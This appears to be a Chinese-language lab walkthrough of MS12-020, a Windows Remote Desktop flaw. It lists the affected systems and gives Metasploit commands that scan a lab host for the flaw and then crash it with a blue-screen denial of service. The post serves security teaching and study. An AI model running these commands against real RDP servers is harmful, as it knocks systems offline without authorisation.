远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)

 

[漏洞说明]:

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)

介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

 

受影响系统:

开了RDP的

Microsoft Windows XP Professional

Microsoft Windows XP Home

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 7

环境: 

攻击机kali          192.168.115.28

靶机windows 2003 server   192.168.115.21

远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)_第1张图片

 

扫描是否存在此漏洞

search ms12

use auxiliary/scanner/rdp/ms12_020_check

set RHOSTS 192.168.115.21

run

远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)_第2张图片

 

远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)_第3张图片

 

死亡蓝屏攻击

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set RHOSTS 192.168.115.21

run

远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)_第4张图片

远程桌面--------ms12-020 漏洞复现 (死亡蓝屏)_第5张图片

你可能感兴趣的:(内网安全,漏洞复现)